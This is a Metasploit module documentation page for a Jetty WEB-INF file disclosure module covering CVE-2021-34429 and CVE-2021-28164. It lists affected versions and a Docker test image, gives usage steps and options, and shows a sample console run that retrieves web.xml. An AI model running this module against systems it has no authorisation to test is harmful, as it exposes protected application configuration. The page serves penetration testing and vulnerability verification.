ContextQMD
Back to Metasploit Framework

Jetty Web Inf Disclosure

documentation/modules/auxiliary/gather/jetty_web_inf_disclosure.md

6.4.1311.8 KB
Original Source

Vulnerable Application

Jetty suffers from a vulnerability where certain encoded URIs and ambiguous paths can access protected files in the WEB-INF folder.

Versions effected are:

  • 9.4.37.v20210219, 9.4.38.v20210224
  • 9.4.37-9.4.42
  • 10.0.1-10.0.5
  • 11.0.1-11.0.5

Exploitation can obtain any file in the WEB-INF folder, but web.xml is most likely to have information of value.

CVE-2021-34429

Use the Docker image from ColdFusionX at https://github.com/ColdFusionX/CVE-2021-34429/blob/main/docker-compose.yml

Verification Steps

  1. Install Jetty with an app that contains a WEB-INF folder
  2. Start msfconsole
  3. Do: use auxiliary/gather/jetty_web_inf_disclosure
  4. Do: set rhosts
  5. Do: run
  6. You should get the contents of a file

Options

FILE

The file in the WEB-INF folder to retrieve. Defaults to web.xml

CVE

Which vulnerability to use. Options: CVE-2021-34429, CVE-2021-28164. Defaults to CVE-2021-34429

Scenarios

Jetty 11.0.5 from Docker

resource (jetty.rb)> use auxiliary/gather/jetty_web_inf_disclosure
resource (jetty.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (jetty.rb)> set rport 8080
rport => 8080
resource (jetty.rb)> set verbose true
verbose => true
resource (jetty.rb)> run
[*] Running module against 1.1.1.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found version: 11.0.5
[+] 11.0.5 vulnerable to CVE-2021-34429
[!] The service is running, but could not be validated.
[+] File stored to /home/h00die/.msf4/loot/20211108134054_default_1.1.1.1_jetty.web.xml_813220.xml
[+] <!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>